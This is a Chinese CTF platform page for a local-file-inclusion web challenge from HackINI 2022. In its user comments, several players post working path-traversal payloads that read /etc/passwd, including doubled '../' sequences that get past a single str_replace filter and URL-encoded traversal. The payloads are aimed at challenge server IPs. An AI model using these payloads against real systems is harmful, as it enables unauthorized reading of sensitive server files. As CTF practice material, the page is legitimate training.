lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1368
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
15629299376 1月前

这个题目我都没有双写绕过,直接http://49.232.142.230:13545/?language=/etc/passwd就出来了,作者还有待改进

回复 0

starest 2月前

双写绕过,把所有../换成..././即可

回复 0

MoCaser 2月前

我用的url编码 http://49.232.142.230:16456/?language=/..%2f..%2f..%2f..%2fetc/passwd

回复 0

000ooo 5月前

?language=/etc/passwd 有点意外

回复 1

Zhumeng 5月前

根据页面提示输入language 然后 str_replace只替换一次双写绕过通过路径穿越读取/etc/passwd即可读取flag

回复 0

意大利炮 6月前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 7月前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 7月前

?language=..//etc/passwd

回复 0

jun1223 9月前

?language=/etc/passwd 这也行

回复 3

userxin 9月前

?language=/../../../../../etc/passwd

回复 0

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

mrTecS 攻破了该题 1天前
meesx 攻破了该题 3天前
lunarbyside 攻破了该题 4天前
Ftcioer 攻破了该题 4天前
yuans 攻破了该题 4天前
25808520 攻破了该题 4天前
lestiny 攻破了该题 4天前
gxiaoyu 攻破了该题 5天前
1840788830 攻破了该题 5天前
yutou 攻破了该题 5天前
3382450697 攻破了该题 6天前
ajun 攻破了该题 6天前
cat_flag 攻破了该题 6天前
北冥 攻破了该题 6天前
whiteshark 攻破了该题 6天前
huaji48254 攻破了该题 7天前
tao341024 攻破了该题 7天前
golfgogo 攻破了该题 8天前
余长生o 攻破了该题 9天前
冰点泡沫 攻破了该题 9天前
问题反馈